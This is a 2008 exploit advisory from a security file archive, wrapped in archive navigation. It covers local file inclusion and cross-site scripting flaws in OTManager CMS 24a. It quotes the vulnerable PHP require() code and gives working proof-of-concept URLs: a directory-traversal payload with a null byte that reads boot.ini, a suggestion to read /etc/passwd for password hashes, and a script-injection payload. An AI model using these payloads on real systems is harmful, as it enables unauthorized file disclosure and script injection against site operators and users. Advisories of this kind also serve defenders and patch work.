otmanager-lfixss.txt

otmanager-lfixss.txt: Posted Jun 28, 2008; Authored by CWH Underground | Site citecclub.org; OTManager CMS version 24a suffers from local file inclusion and cross site scripting vulnerabilities.; tags | exploit, local, vulnerability, xss, file inclusion; SHA-256 | 2421263c1a78925b81d5173a2e148a1cd24bcf9b2408819cfae5dfd26e63aa8b; Download | Favorite | View

otmanager-lfixss.txt

===========================================================
  OTManager CMS (LFI/XSS) Multiple Remote Vulnerabilities
===========================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O  .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 27 June 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : OTManager CMS
 VERSION     : 24a Completo
 VENDOR      : http://www.otmanager.org/
 DOWNLOAD    : http://downloads.sourceforge.net/otm/OTManager_v24a_Completo.zip
#####################################################

---------------------------------------
 Vulnerable File [index.php?conteudo=]
---------------------------------------

@Line

   76:  if($_REQUEST['conteudo']==""){
   77:  require("Principal.php");
   78:  }else{
   79:  if(!file_exists($_REQUEST['conteudo'].".php")){
   80:  echo '<center><font size="3"><b>404 URL Invalida</b></font><br><br>Por Favor, Selecione o Conteudo no Menu ao Lado.</center>';
   81:  }else{
   82:       require($_REQUEST['conteudo'].".php");
   83:       }
   84:  }


---------
 Exploit
---------

#####
 LFI
#####

[+] http://[Target]/[otmanager_path]/index.php?conteudo=[LFI]

   
    This exploit will open boot.ini in system file:

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

    You can change boot.ini to /etc/passwd%00 in linux OS, For view pass hash.

#####
 XSS
#####

[+] http://[Target]/[otmanager_path]/index.php?conteudo=[XSS]


-------------
 POC Exploit
-------------

#####
 LFI
#####

[+] http://192.168.24.25/otmanager/index.php?conteudo=../../../../../../../../boot.ini%00

#####
 XSS
#####

[+] http://192.168.24.25/otmanager/index.php?conteudo=</title><script>alert('XSS test');</script>


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

Top Authors In Last 30 Days

Red Hat 293 files
Ubuntu 61 files
Debian 34 files
Gentoo 32 files
LiquidWorm 10 files
nu11secur1ty 7 files
malvuln 5 files
Adam Gowdiak 4 files
liquidsky 3 files
kai6u 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,038)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,499)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,580)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,745)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,490)
UNIX (9,397)
UnixWare (187)
Windows (6,656)
Other

otmanager-lfixss.txt

otmanager-lfixss.txt

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

otmanager-lfixss.txt

Share This

otmanager-lfixss.txt

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems